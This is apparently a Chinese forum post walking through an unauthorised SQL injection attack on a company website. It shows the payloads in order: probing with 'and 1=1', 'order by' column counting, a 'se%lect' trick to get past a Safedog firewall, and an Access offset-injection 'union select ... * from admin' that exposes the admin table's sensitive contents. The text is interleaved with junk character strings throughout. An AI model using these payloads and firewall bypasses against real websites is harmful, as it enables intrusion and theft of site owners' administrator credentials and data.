打开网站,一个企业站。
# Q' o% I( r1 R$ O0 O; N" t9 X7 [9 z/ G* r7 I+ o
* L; a. P, \' a4 V5 F顺手加个admin
4 u R* i- g# s) s. S$ b2 ]! ^
% Q% \3 l' R: K
/ ^: g: {+ ?/ Z1 b6 Z默认后台。
1 k3 g; @ L; g @; r3 Q* |( B回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
6 |5 a! f$ t2 I% `5 o$ J0 y
( o2 Z6 x0 U: X7 P0 l6 M5 C6 M% ^4 |+ u# P4 h( c) K
9 M) \) s6 f4 E, h5 _, N$ m所以就不用御剑扫了,待会直接封IP。
) T" _" l: E+ A# H2 W: |
5 H+ l" y' q% W6 X' N用order by语句判断是否存在注入。! r0 v) |+ |# q( V$ i6 P( \3 f
http://www.xxx.com /product_show.asp?id=997 order by 1
% x- H( z0 J4 B" U1 q& v. E, Lhttp://www.xxx.com /product_show.asp?id=997 order by 100; o% V/ C9 r' T8 Q
现在存在注入,经测试后发现是9个字段。# d: R6 ~# b7 O
" m0 K4 p+ m- O0 w8 W
接下来进行联合查询,猜是否存在admin表。* h. G X v1 F0 o3 E
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。! U) j+ V/ i# @9 g" W; P3 b
! r% X: s2 L* x, w' S& ~3 Z5 m
" e- {1 }$ p0 `/ s! p# i: h8 E, n/ H1 ?" ^' F; Y
在select中间加个%,se%lect绕过安全狗。
7 c$ W+ z; D7 R% J# U3 y" ]4 a4 D) t. @7 _ `% h
- P( ]- G8 x7 o$ @7 {$ j5 M5 |6 O
发现存在admin表,然后开始手工猜常用的字段。
! i& [5 ?4 X3 o- G纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
2 Z; @5 |$ e5 ~9 B 5 v9 r, x2 X1 C+ ^
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。7 E! a. ^, N' O! Z/ A7 q
/ r" V0 b9 P( @科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
- H+ F1 N/ C3 o" ?) M8 S1 e+ ihttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
# H$ c7 E* g! v7 x' u好了,敏感内容出显了。
$ m' z, a8 w( q- y. k/ }0 x1 F$ i9 m% ?. ^9 ^ j+ g. u+ Z
& g- g/ }7 b% A& H2 ]! P
7 Q3 }, ?% w2 q. |- m0 C& J1 k
|